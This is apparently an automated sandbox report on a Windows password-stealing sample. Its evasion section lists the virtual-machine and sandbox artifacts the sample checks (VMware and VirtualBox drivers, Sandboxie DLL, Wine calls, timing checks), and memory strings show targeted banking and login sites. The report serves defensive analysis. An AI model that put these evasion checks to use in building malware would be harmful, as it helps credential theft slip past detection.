            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\unregmp2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe PID: 1512, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeMemory allocated: 1DF0A230000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeMemory allocated: 1DF23BB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334D1C0 rdtsc 6_2_0334D1C0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7145Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2323Jump to behavior
            Source: C:\Windows\SysWOW64\sc.exeWindow / User API: threadDelayed 9782Jump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeWindow / User API: foregroundWindowGot 721
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\sc.exeAPI coverage: 3.0 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5360Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7012Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\sc.exe TID: 2864Thread sleep count: 190 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\sc.exe TID: 2864Thread sleep time: -380000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\sc.exe TID: 2864Thread sleep count: 9782 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\sc.exe TID: 2864Thread sleep time: -19564000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe TID: 5204Thread sleep time: -70000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe TID: 5204Thread sleep time: -37500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe TID: 5204Thread sleep time: -31000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\sc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\sc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E1BCA0 FindFirstFileW,FindNextFileW,FindClose,13_2_02E1BCA0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: Amcache.hve.9.drBinary or memory string: VMware
            Source: c23yo28O4.13.drBinary or memory string: discord.comVMware20,11696487552f
            Source: wmplayer.exe, 0000000F.00000002.3942884266.00000000005F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD005-21-t
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: c23yo28O4.13.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: c23yo28O4.13.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: wmplayer.exe, 0000000F.00000002.3942884266.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000000F.00000002.3948423775.00000000073DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
            Source: c23yo28O4.13.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: c23yo28O4.13.drBinary or memory string: global block list test formVMware20,11696487552
            Source: c23yo28O4.13.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: c23yo28O4.13.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: c23yo28O4.13.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: c23yo28O4.13.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: firefox.exe, 00000015.00000002.2617153702.00000190990FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAA
            Source: c23yo28O4.13.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: Amcache.hve.9.drBinary or memory string: vmci.sys
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: c23yo28O4.13.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: c23yo28O4.13.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: c23yo28O4.13.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: Amcache.hve.9.drBinary or memory string: VMware20,1
            Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
            Source: wmplayer.exe, 0000000F.00000002.3948423775.00000000072E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&0000005
            Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: wmplayer.exe, 0000000F.00000002.3948423775.00000000073B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW2v
            Source: wmplayer.exe, 0000000F.00000002.3942884266.000000000060A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: c23yo28O4.13.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3945109177.000000000164F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
            Source: c23yo28O4.13.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: c23yo28O4.13.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
            Source: c23yo28O4.13.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.9.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
            Source: wmplayer.exe, 0000000F.00000002.3945969013.0000000005500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00-5-21-2246122658-3693405117-2476756634-1003_Classes\WOW6432Node\Interface\{27354133-7F64-5B0F-8F00-5D77AFBE261E}\P
            Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: wmplayer.exe, 0000000F.00000002.3945969013.0000000005500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00-
            Source: c23yo28O4.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
            Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: sc.exe, 0000000D.00000002.3942849584.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000011.00000003.2443465756.000002454956E000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000011.00000003.2445206793.000002454956F000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000011.00000003.2442667644.000002454956E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: c23yo28O4.13.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: c23yo28O4.13.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: c23yo28O4.13.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: c23yo28O4.13.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: c23yo28O4.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: c23yo28O4.13.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: c23yo28O4.13.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
